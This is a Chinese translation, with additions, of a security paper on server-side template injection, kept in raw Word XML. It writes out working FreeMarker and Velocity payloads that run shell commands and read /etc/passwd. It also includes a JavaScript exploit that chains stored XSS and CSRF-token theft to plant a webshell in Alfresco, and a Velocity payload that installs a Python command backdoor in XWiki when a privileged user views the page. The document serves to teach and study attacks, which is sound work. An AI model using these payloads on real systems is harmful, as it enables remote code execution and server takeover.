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 xml:space="preserve">0x00 </w:t>
      </w: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前言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原文链接：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hyperlink r:id="rId8" w:tgtFrame="_blank" w:tooltip="View all posts in https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https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://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:tooltip="View all posts in App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App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-wp.pdf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最近看了这篇文章，其实也不是新技术，但是作者给出的两个攻击案例很不错，看到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drops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里面有人</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:tooltip="View all posts in 翻译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翻译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了这篇文章，但是没有把攻击案例翻译出来，于是把这部分内容补充上。这两个案例分别针对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FreeMarker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Velocity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，所以把作者针对这两个模板引擎编写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Exploit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的过程也翻译出来。</w:t>
      </w:r>
    </w:p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0x01 </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:tooltip="View all posts in 开发" w:history="1">
        <w:r w:rsidRPr="007B526D">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="428BCA"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>开发</w:t>
        </w:r>
      </w:hyperlink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Exploit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很多的模板引擎都会试图限制模板程序执行任意</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:tooltip="View all posts in 代码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代码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能力，来防止应用层逻辑对表达式引擎的攻击。还有一些模板引擎则尝试通过沙盒等手段来</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:tooltip="View all posts in 安全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安全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处理不可信的用户输入。在这些措施之下，开发一个模板后门变得非常有挑战性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B526D" w:rsidRPr="007B526D" w:rsidRDefault="007B526D" w:rsidP="007B526D">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="240"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B526D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FreeMarker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FreeMarke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是最流行的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模板之一，也是最频繁的交给用户操作的模板。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FreeMarker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官网解释了允许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“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用户提供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”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模板的危险性：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4616450" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="图片 14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对应翻译：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22.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可以允许用户上传模板文件吗，这对安全性有影响吗？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一般来说，你不应该允许用户做这样的操作，除非是</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:tooltip="View all posts in 管理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管理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员或者可信用户。考虑到模板就是和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*.</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:tooltip="View all posts in java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java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文件类似的源代码文件。如果你依然想要允许用户上传模板文件，这里是你应该考虑的东西：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http://freemarker.org/docs/app_faq.html#faq_template_uploading_security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lastRenderedPageBreak/>
        <w:t>在一些类似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DoS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这种低风险安全问题之后，我们可以看到下面这个：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66D63088" wp14:editId="4210AD6B">
            <wp:extent cx="5580380" cy="1905774"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="图片 13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对应翻译：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内置的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new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操作符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（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Configuration.setNewBuiltinClassResolver,Environment.setNewBuiltinClassResolver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）：在模板文件中像这样使用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”com.</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:tooltip="View all posts in example" w:history="1">
        <w:r w:rsidRPr="007B526D">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
            <w:color w:val="428BCA"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>example</w:t>
        </w:r>
      </w:hyperlink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.SomeClass”?new()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，这个对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FTL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库来说很重要，但是在正常的模板文件中时不需要使用。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FreeMarker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中包含一个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接口，这个接口可以用于构造任意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对象，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new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操作符可以</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:tooltip="View all posts in 实例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实例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化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的实现类。有一些危险的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实现类有可能会在</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:tooltip="View all posts in classpath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classpath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中。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就算一个类没有实现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接口，这个类里面的静态代码块也会被执行。为了避免这种情况出现，你可以使用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TemplateClassResolver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类来制约对类的访问，像下面这样：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TemplateClassResolver.ALLOWS_NOTHING_RESOLVER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这条警告略显神秘，但是它让我们想到通过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b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>内置的</w:t>
      </w:r>
      <w:r w:rsidRPr="007B526D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="007B526D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>操作符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来完成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exp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也许是可以的。让我们看一下关于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new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操作符的文档：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1EDBE1B7" wp14:editId="746EDBD5">
            <wp:extent cx="5580380" cy="1323347"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="图片 12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2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对应翻译：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这个内置的操作符需要引起安全关注，因为模板的编写人可以通过它来构造任意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对象然后使用这些构造处理的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对象，只要他们实现了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接口。而且模板编写者还能够触发类中静态代码块中的代码，即使这个类没有实现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接口。如果你允许不是很信任的用户上传模板，你应该看一下下面这个主题。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http://freemarker.org/docs/ref_builtins_expert.html#ref_builtin_new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的实现类中存在对我们有用的类吗？让我们来看一下这个接口的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JavaDoc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7EE81FD5" wp14:editId="2A1A3A7F">
            <wp:extent cx="5580380" cy="2465996"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="图片 11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一个类的名字出现了：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Execute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查看这个类的详情可以发现它能够做我们想要做的事：接收输入并且执行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6667500" cy="844550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="图片 10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使用它非常简单：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&lt;#assign ex="freemarker.template.utility.Execute"?new()&gt;  ${ ex("id") }   uid=119(</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:tooltip="View all posts in tomcat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tomcat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7) gid=127(tom</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tgtFrame="_blank" w:tooltip="View all posts in cat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cat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7) groups=127(tomcat7) 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这个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payload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在后面将会非常有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B526D" w:rsidRPr="007B526D" w:rsidRDefault="007B526D" w:rsidP="007B526D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3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补充：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经过对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TemplateModel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的其他实现类进行研究，发现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ObjectCon</w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tgtFrame="_blank" w:tooltip="View all posts in struct" w:history="1">
        <w:r w:rsidRPr="007B526D">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
            <w:color w:val="428BCA"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>struct</w:t>
        </w:r>
      </w:hyperlink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or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类同样很有用，从名字上就可以看出来，这个类是用来构造其他类的对象的，看一下代码就可以明白如何使用了：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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5676900" cy="4800600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="图片 9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通过代码可以看到提供类名称和构造函数的</w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:tooltip="View all posts in 参数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参数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，就可以利用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ObjectConstructor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类构造我们想要的类，有了这个我们就可以执行任意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代码了，下面给出两个实例，一个是执行命令，另一个是文件读取。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B526D" w:rsidRPr="007B526D" w:rsidRDefault="007B526D" w:rsidP="007B526D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:line="375" w:lineRule="atLeast"/>
        <w:ind w:left="0"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命令执行：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&lt;#assign ob="freemarker.template.utility.ObjectConstructor"?new()&gt;  &lt;#assign br=ob("java.io.BufferedReader",ob("java.io.InputStreamReader",ob("java.lang.ProcessBuilder","ifconfig").s</w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:tgtFrame="_blank" w:tooltip="View all posts in tar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tar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t().getInputStream())) &gt;   &lt;#</w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:tgtFrame="_blank" w:tooltip="View all posts in list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list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 1..10000 as t&gt;  &lt;#assign line=br.readLine()!"null"&gt;  &lt;#if line=="null"&gt;   &lt;#break&gt;  &lt;/#if&gt;  ${line}  ${"&lt;br&gt;"} &lt;/#list&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007B526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7B526D" w:rsidRPr="007B526D" w:rsidRDefault="007B526D" w:rsidP="007B526D">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:line="375" w:lineRule="atLeast"/>
        <w:ind w:left="0"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文件读取：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&lt;#assign ob="freemarker.template.utility.ObjectConstructor"?new()&gt;  &lt;#assign br=ob("java.io.BufferedReader",ob("java.io.InputStreamReader",ob("</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">java.io.FileInputStream","/etc/passwd"))) &gt;   &lt;#list 1..10000 as t&gt;  &lt;#assign line=br.readLine()!"null"&gt;  &lt;#if line=="null"&gt;   &lt;#break&gt;  &lt;/#if&gt;  ${line?html}  ${"&lt;br&gt;"} &lt;/#list&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007B526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Velocity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Velocity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是另一个流行的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模板框架，非常难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exploit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。没有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“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安全注意事项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”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页面来指出存在风险的函数和内部变量。下面这张截图显示的是用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Burp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暴力破解变量名，左侧是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payload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右边是</w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:tgtFrame="_blank" w:tooltip="View all posts in 服务器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服务器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的返回值。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032BB076" wp14:editId="3E1D5856">
            <wp:extent cx="5580380" cy="4081649"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="图片 8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0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变量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class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看起来有用，因为它返回了一个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Object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类的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Class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对象。通过</w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:tgtFrame="_blank" w:tooltip="View all posts in Google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Google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找到了这个链接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https://velocity.</w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:tgtFrame="_blank" w:tooltip="View all posts in apache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apache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.org/tools/releases/2.0/summary.html :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5867400" cy="476250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7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可以看到一个方法和一个属性：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6667500" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6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lastRenderedPageBreak/>
        <w:t>我们可以把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$class.inspect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$class.type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结合起来构造任意的对象。然后我们就可以通过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Runtime.exec()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执行任意命令了。这个想法用下面的代码可以确认，这段代码会造成一个延迟。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$class.inspect("java.lang.Runtime").type.getRuntime().exec("sleep 5").waitFor() [5 second time delay] 0 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获取命令执行结果有一点麻烦：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#set($str=$class.inspect("java.lang.String").type) #set($chr=$class.inspect("java.lang.Character").type) #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $str.</w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:tgtFrame="_blank" w:tooltip="View all posts in value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value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Of($chr.toChars($out.read())) #end tomcat7 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B526D" w:rsidRPr="007B526D" w:rsidRDefault="007B526D" w:rsidP="007B526D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3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补充：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不得不说原文作者的方法有点麻烦，而且这种方式只能用在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Velocity Tool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中，不能用在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Velocity Engine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中，其实这个直接用反射就可以，代码如下：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#set ($exp = "exp") $exp.getClass().forName("java.lang.Runtime").getRuntime().exec("whoami") </w:t>
      </w:r>
    </w:p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 xml:space="preserve">0x02 </w:t>
      </w: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两个案例</w:t>
      </w:r>
    </w:p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案例</w:t>
      </w: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1:Alfresco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Alfresco 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是一个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CMS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系统。低权限用户可以借助一个存储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XSS</w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:tgtFrame="_blank" w:tooltip="View all posts in 漏洞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漏洞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，利用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FreeMarker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模板注入方式获取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WebShell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。前面创建的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FreeMarker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后门可以直接使用，但是我把它扩展成了用请求参数作为命令的形式：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&lt;#assign ex="freemarker.template.utility.Execute"?new()&gt; ${ ex(url.getArgs())} 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低权限用户没有权限编辑模板，但是可以通过存储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XSS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利用管理员账户来</w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:tgtFrame="_blank" w:tooltip="View all posts in 安装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安装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这个后门。我编写了下面的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JavaScr</w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:tgtFrame="_blank" w:tooltip="View all posts in ip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ip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t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代码来完成这种攻击：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#!javascript tok = /Alfresco-CSRFToken=([^;]*)/.exec(document.cookie)[1];  tok = </w:t>
      </w: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">decodeURIComponent(tok) do_csrf=new </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:tgtFrame="_blank" w:tooltip="View all posts in XML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XML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HttpRequest(); do_csrf.open("POST","http://"+document.domain+":8080/share/proxy/alfresco/api/</w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:tgtFrame="_blank" w:tooltip="View all posts in node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node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/workspace /SpacesStore/59d3cbdc-70cb-419e-a325-759a4c307304/formprocessor",false); do_csrf.setRequestHeader('Content-Type','application/</w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:tgtFrame="_blank" w:tooltip="View all posts in json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json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>; charset=UTF-8'); do_csrf.setRequestHeader('Alfresco-CSRFToken',tok); do_csrf.send('{"prop_cm_name":"folder.get.html.ftl","prop_cm_content":"&amp;lgt;#assign ex=//"freemarker.template.utility.Execute//"?new()&gt; ${ ex(url.getArgs())}","prop_cm_</w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:tgtFrame="_blank" w:tooltip="View all posts in description" w:history="1">
        <w:r w:rsidRPr="007B526D">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
            <w:color w:val="428BCA"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>description</w:t>
        </w:r>
      </w:hyperlink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":""}'); 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模板的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G</w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:tgtFrame="_blank" w:tooltip="View all posts in UI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UI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D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是有差别的，但是低权限的用户也可以很容易的通过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“</w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:tgtFrame="_blank" w:tooltip="View all posts in 数据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数据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字典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”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获得。此外和其他应用的管理员可以控制整个</w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:tgtFrame="_blank" w:tooltip="View all posts in web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web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服务器不同，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alfresco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系统管理员可以做的操作是有严格限制的。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49744FA8" wp14:editId="0E20AC63">
            <wp:extent cx="5580380" cy="898175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 5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89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案例</w:t>
      </w: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2:XWiki Enterprise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 Enterprise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是一个专业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程序。在默认</w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:tgtFrame="_blank" w:tooltip="View all posts in 配置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配置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情况下，匿名的用户可以注册用户并且编辑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页面时可以嵌入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Velocity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模板代码。这种特性让它成为了模板注入的理想目标。然而，前面创建的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Velocity payload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是不能用的，原因是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$class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在这里是不能使用的。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对于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Velocity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是这样说的：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15CF3C31" wp14:editId="4A44CE49">
            <wp:extent cx="5580380" cy="1737890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4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7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对应翻译：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lastRenderedPageBreak/>
        <w:t>XWiki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沙盒通过提供安全的对象访问，并且每个</w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:tgtFrame="_blank" w:tooltip="View all posts in API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API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调用都会检测权限，禁止对未授权的资源进行操作，所以不需要特别的权限控制。其他脚本语言需要脚本语言编写人有权限执行他们，但是除此之外，访问的是服务器上的所有资源。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…… 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没有权限就不能实例化对象，只能使用文字和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 APIs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提供的安全的资源。如果按照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提供的正确方式，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可以安全的开发出大量的应用来。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…… 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浏览包含脚本的页面是不需要拥有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Programming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权限的，只有在保存的时候需要。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 xml:space="preserve"> http://platform.xwiki.org/xwiki/bin/view/DevGuide/Scripting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换句话来说，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不仅支持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Velocity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，也支持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Groovy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Python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这种没有沙盒的脚本。然而这种操作需要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programming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权限。这是个好事，因为它把提权转变成了任意代码执行。由于我们只能使用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Velocity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，我们必须使用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XWiki API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。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$doc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类又一些很有趣的方法，聪明的读者可能会发现一个缺陷：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6667500" cy="1720850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3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一个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页面的内容作者是最后一个编辑它的用户。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save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方法和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saveAsAuthor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方法的不同说明，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  <w:t>save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 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方法不会用作者身份保存内容，而是用当前访问页面用户的身份。换句话说，一个低权限用户可以创建一个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wiki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页面，当拥有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programming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权限的用户查看并且编辑保存这个页面的时候脚本就会执行。我们来注入下面这个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Python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后门：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#!python from subprocess import check_output  q = request.get('q') or 'true' q = q.split(' ')  print ''+check_output(q)+''  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我们只需要添加一些代码来获取管理员的权限：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B526D" w:rsidRPr="007B526D" w:rsidRDefault="007B526D" w:rsidP="007B52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7B526D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">innocent content  #if( $doc.hasAccessLevel("programming") )  $doc.setContent("  innocent content  from subprocess import check_output  q = request.get('q') or 'true'  q = q.split(' ')  print ''+check_output(q)+''  ")  $doc.save()  #end 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lastRenderedPageBreak/>
        <w:t>当包含有这样内容的页面被一个有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programming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权限的用户查看的时候，后门会自动安装。之后所有访问这个页面的人都可以执行任意命令了：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noProof/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49554B30" wp14:editId="68325DE8">
            <wp:extent cx="5580380" cy="4311356"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="服务端模板注入：现代WEB远程代码执行（补充翻译和扩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服务端模板注入：现代WEB远程代码执行（补充翻译和扩展）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31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6D" w:rsidRPr="007B526D" w:rsidRDefault="007B526D" w:rsidP="007B526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 xml:space="preserve">0x03 </w:t>
      </w:r>
      <w:r w:rsidRPr="007B526D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>后记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B526D" w:rsidRPr="007B526D" w:rsidRDefault="007B526D" w:rsidP="007B526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hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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作者提出的这种攻击思路还是很不错的，以前也了解这种模板文件可以用来执行任意代码，但是没有很深入的去思考进一步的利用方式，传统的攻击思路一般是获取后台管理员权限，然后利用上传等漏洞</w:t>
      </w:r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get</w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:tgtFrame="_blank" w:tooltip="View all posts in shell" w:history="1">
        <w:r w:rsidRPr="007B526D">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="428BCA"/>
            <w:kern w:val="0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007B526D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，但其实后台编辑模板的功能很多时候就可以直接执行任</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidRDefault="007A5775" w:rsidP="00E413A6"/>
    <w:sectPr w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidSect="00B07B2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D3" w:rsidRDefault="00F349D3" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F349D3" w:rsidRDefault="00F349D3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7B526D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7B526D">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>9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D3" w:rsidRDefault="00F349D3" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F349D3" w:rsidRDefault="00F349D3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F349D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F349D3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F349D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10D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C45E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6826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B526D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B6826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349D3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5E690CA-47B2-445F-9D9A-5F395331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7B526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526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B526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526D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526D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B526D"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs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B52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526D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="wpkeywordlinkaffiliate">
    <w:name w:val="wp_keywordlink_affiliate"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007B526D"/>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007B52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526D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7B526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B5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B526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uhaihua.cn/archives/tag/%e5%ae%89%e5%85%a8" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/example" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/struct" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/%e5%ae%89%e8%a3%85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www.liuhaihua.cn/archives/tag/apache" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/node" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/web" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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liuhaihua.cn/archives/tag/java-2" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/tar" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/%e5%bc%80%e5%8f%91" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/tomcat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liuhaihua.cn/archives/tag/value" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/ip" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/ui" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13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www.liuhaihua.cn/archives/tag/%e5%ae%9e%e4%be%8b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hyperlink" Target="http://www.liuhaihua.cn/archives/tag/list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www.liuhaihua.cn/archives/tag/json" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/https" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/api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iuhaihua.cn/archives/tag/%e4%bb%a3%e7%a0%81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liuhaihua.cn/archives/tag/cat" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/google" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/%e6%bc%8f%e6%b4%9e" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/%e6%95%b0%e6%8d%ae" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/classpath" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/xml" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/shel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liuhaihua.cn/archives/tag/%e7%ae%a1%e7%90%86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liuhaihua.cn/archives/tag/%e5%8f%82%e6%95%b0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://www.liuhaihua.cn/archives/tag/%e9%85%8d%e7%bd%ae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liuhaihua.cn/archives/tag/tanslate" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/host" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.liuhaihua.cn/archives/tag/description" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12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liuhaihua.cn/archives/tag/ap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BD0CB-E1A0-4EEA-B0B9-5B14D36B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2016-12-06T16:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-06T16:30:00Z</dcterms:modified>
